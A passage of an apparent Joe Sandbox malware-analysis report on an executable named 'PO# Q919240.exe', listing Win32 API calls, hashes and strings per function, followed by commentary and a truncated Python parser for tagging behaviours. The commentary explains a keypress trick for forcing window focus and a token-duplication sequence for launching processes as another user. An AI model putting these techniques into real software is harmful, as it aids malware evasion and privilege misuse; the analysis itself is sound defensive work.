                • GetCursorPos.USER32(?), ref: 0047CC72
                • ScreenToClient.USER32(?,?), ref: 0047CC80
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                • SendMessageW.USER32 ref: 0047CD12
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                • SendMessageW.USER32 ref: 0047CD80
                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                • GetCursorPos.USER32(?), ref: 0047CDC8
                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                • GetParent.USER32(00000000), ref: 0047CDF7
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                • SendMessageW.USER32 ref: 0047CE93
                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                • TrackPopupMenuEx.USER32(?,00000000,?,?,00941BC0,00000000,?,?,?,?), ref: 0047CF1C
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                • SendMessageW.USER32 ref: 0047CF6B
                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                • TrackPopupMenuEx.USER32(?,00000080,?,?,00941BC0,00000000,?,?,?,?), ref: 0047CFE6
                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                • String ID: @GUI_DRAGID$F
                • API String ID: 3100379633-4164748364
                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                APIs
                • GetForegroundWindow.USER32 ref: 00434420
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                • IsIconic.USER32(?), ref: 0043444F
                • ShowWindow.USER32(?,00000009), ref: 0043445C
                • SetForegroundWindow.USER32(?), ref: 0043446A
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                • GetCurrentThreadId.KERNEL32 ref: 00434485
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                • keybd_event.USER32(00000012,00000000), ref: 00434514
                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 2889586943-2988720461
                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                APIs
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                • CloseHandle.KERNEL32(?), ref: 004463A0
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                • GetProcessWindowStation.USER32 ref: 004463D1
                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                • _wcslen.LIBCMT ref: 00446498
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _wcsncpy.LIBCMT ref: 004464C0
                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                • CloseWindowStation.USER32(00000000), ref: 0044656C
                • CloseDesktop.USER32(?), ref: 0044657A
                • SetProcessWindowStation.USER32(?), ref: 00446588
                • CloseHandle.KERNEL32(?), ref: 00446592
                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                • String ID: $@OH$default$winsta0
                • API String ID: 3324942560-3791954436
                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                APIs
                • _wcslen.LIBCMT ref: 004096C1
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 0040970C
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                • _memmove.LIBCMT ref: 00409D96
                • _memmove.LIBCMT ref: 0040A6C4
                • _memmove.LIBCMT ref: 004297E5
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                • String ID:
                • API String ID: 2383988440-0
                • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • _wcscat.LIBCMT ref: 0044BD94
                • _wcscat.LIBCMT ref: 0044BDBD
                • __wsplitpath.LIBCMT ref: 0044BDEA
                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                • _wcscpy.LIBCMT ref: 0044BE71
                • _wcscat.LIBCMT ref: 0044BE83
                • _wcscat.LIBCMT ref: 0044BE95
                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                • FindClose.KERNEL32(00000000), ref: 0044BF33
                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                • String ID: \*.*
                • API String ID: 2188072990-1173974218
                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                • FindClose.KERNEL32(00000000), ref: 00478924
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                • __swprintf.LIBCMT ref: 004789D3
                • __swprintf.LIBCMT ref: 00478A1D
                • __swprintf.LIBCMT ref: 00478A4B
                • __swprintf.LIBCMT ref: 00478A79
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                • __swprintf.LIBCMT ref: 00478AA7
                • __swprintf.LIBCMT ref: 00478AD5
                • __swprintf.LIBCMT ref: 00478B03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                • API String ID: 999945258-2428617273
                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                • __wsplitpath.LIBCMT ref: 00403492
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcscpy.LIBCMT ref: 004034A7
                • _wcscat.LIBCMT ref: 004034BC
                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                • _wcscpy.LIBCMT ref: 004035A0
                • _wcslen.LIBCMT ref: 00403623
                • _wcslen.LIBCMT ref: 0040367D
                Strings
                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                • Unterminated string, xrefs: 00428348
                • _, xrefs: 0040371C
                • Error opening the file, xrefs: 00428231
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                • API String ID: 3393021363-188983378
                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                APIs
                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                • FindClose.KERNEL32(00000000), ref: 00431B20
                • FindClose.KERNEL32(00000000), ref: 00431B34
                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                • FindClose.KERNEL32(00000000), ref: 00431BCD
                • FindClose.KERNEL32(00000000), ref: 00431BDB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                • String ID: *.*
                • API String ID: 1409584000-438819550
                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                APIs
                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                • __swprintf.LIBCMT ref: 00431C2E
                • _wcslen.LIBCMT ref: 00431C3A
                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                • String ID: :$\$\??\%s
                • API String ID: 2192556992-3457252023
                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                APIs
                • GetLocalTime.KERNEL32(?), ref: 004722A2
                • __swprintf.LIBCMT ref: 004722B9
                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FolderPath$LocalTime__swprintf
                • String ID: %.3d
                • API String ID: 3337348382-986655627
                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
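                The function listings above are static, per-function API inventories, not observed calls: `?` marks an argument the sandbox could not resolve, and "Part of subcall function" bullets belong to a callee, not to the function itself. Three of the listings describe recognisable Win32 sequences that an analyst triaging this report would want to pick out by hand: the GetForegroundWindow / AttachThreadInput / MapVirtualKeyW(0x12) / keybd_event / SetForegroundWindow sequence (0x12 is VK_MENU, the Alt key; pressing it is the long-standing trick for forcing SetForegroundWindow to succeed from a background process), the DuplicateTokenEx / OpenWindowStationW("winsta0") / OpenDesktopW("default") / LoadUserProfileW / CreateEnvironmentBlock / CreateProcessAsUserW sequence (launching a process under another user's token with that user's profile and environment), and the run of SHGetFolderPathW calls whose second argument is a CSIDL (0x26 is CSIDL_PROGRAM_FILES, 0x05 CSIDL_PERSONAL, 0x23 CSIDL_COMMON_APPDATA, and so on). Strings elsewhere in these listings (`@GUI_DRAGID`, `#include depth exceeded`, `Unterminated string`) are characteristic of an embedded scripting runtime, so these functions are runtime library code rather than necessarily payload logic; tagging them is triage, not a verdict.

                The following added example is not part of the Joe Sandbox report or its tooling. It parses the `• Api.MODULE(args), ref: addr` bullet format as it appears on this page (the format is inferred from these listings), resolves the key-code and CSIDL constants, and tags a function when every API of a hypothetical behaviour signature is present. The sample lines are excerpted from the three listings above; the signature names and the `BEHAVIOURS` table are this example's own choices.

                ```python
                """Parse 'APIs' bullets from a Joe Sandbox function listing and tag behaviours.

                Added example, not part of the Joe Sandbox report or its tooling. The bullet
                format is inferred from the listings on this page; the sample text below is
                excerpted from those listings.
                """
                import re
                from dataclasses import dataclass
                from typing import List, Optional, Tuple

                # One bullet of an "APIs" block, e.g.
                #   • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                #   • GetCurrentThreadId.KERNEL32 ref: 00434485
                #     • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                API_LINE = re.compile(
                    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<api>[A-Za-z_][\w@:]*)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
                )


                @dataclass(frozen=True)
                class ApiCall:
                    api: str
                    module: str
                    args: Tuple[str, ...]
                    ref: int        # call-site address
                    subcall: bool   # reported from a callee, not from this function


                def parse_api_lines(text: str) -> List[ApiCall]:
                    """Return the ApiCall entries found in a block of report text, in order."""
                    calls = []
                    for line in text.splitlines():
                        m = API_LINE.match(line)
                        if not m:
                            continue  # headings, hashes, dump sources, etc.
                        raw = m.group("args")
                        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
                        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                             int(m.group("ref"), 16), m.group("sub") is not None))
                    return calls


                def _const(arg: str) -> Optional[int]:
                    """Hex argument as int; '?' (unresolved by the sandbox) becomes None."""
                    try:
                        return int(arg, 16)
                    except ValueError:
                        return None


                # Standard Win32 constants seen in these listings.
                VK = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
                CSIDL = {
                    0x05: "CSIDL_PERSONAL", 0x16: "CSIDL_COMMON_STARTMENU",
                    0x17: "CSIDL_COMMON_PROGRAMS", 0x19: "CSIDL_COMMON_DESKTOPDIRECTORY",
                    0x1F: "CSIDL_COMMON_FAVORITES", 0x23: "CSIDL_COMMON_APPDATA",
                    0x26: "CSIDL_PROGRAM_FILES", 0x2B: "CSIDL_PROGRAM_FILES_COMMON",
                    0x2E: "CSIDL_COMMON_DOCUMENTS",
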